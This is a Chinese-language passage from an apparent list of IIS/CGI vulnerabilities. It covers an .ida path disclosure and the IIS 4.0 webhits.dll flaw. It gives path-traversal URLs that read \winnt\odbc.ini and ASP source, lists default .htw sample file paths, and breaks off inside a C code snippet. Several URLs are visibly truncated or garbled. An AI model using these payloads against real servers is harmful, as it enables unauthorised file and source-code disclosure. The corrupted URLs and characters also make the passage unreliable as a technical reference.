|
CGI漏洞(20) could not be found. 输入
 http://www.microsoft.com/1.ida
将出现:
The IDQ file d:\http\1.idq could not be found.
三十五.webhit.dll IIS4.0上有一个应用程序映射htw--->webhits.dll,这是用于Index Server的点击功能的。尽管你不
运行Index Server,该映射仍然有效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文件,
数据库文件,和ASP源代码!有两种方法来实现,第一,如果你的web server上存在.htw后缀的文件,
则可以过下面的方式来查看文件内容,比如查看odbc.ini文件的内容: http://www.xxx.com/iissamples/is ;... ./../winnt/odbc.ini�CiRestriction=none�CiHiliteType=Full 对于IIS的一般安装模式可以在下列位置找到.htw文件:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw
第二、如果你的web server上不存在这个文件,有漏洞的系统仍然允许用户调用
webhits.dll,具体方式如下: http://www.xxx.com/default.htm%2 ;... itsFile=/../../winn
t/odbc.ini�CiRestriction=none�CiHiliteType=Full
条件是default.htm必须存在。这个文件名可以是其它文件,但必须存在。
webhits.dll将会把这个文件作为临时文件打开。当上述URL中的空格符%20达到一定数
目时,web服务的识别功能可能会出现问题,这样webhits.dll将打开指定的文件
\winnt\odbc.ini。如果成功,用同样的方法可以打开更多的文件,包括ASP代码。近
似的原理请见下面这段代码: FILE *fd;
int DoesTemplateExist(char *pathtohtwfile) {
// Just in case inetinfo.exe passes too long a string
// let‘s make sure it‘s of a suitable length and not
// going to open a buffer overrun vulnerability
| 
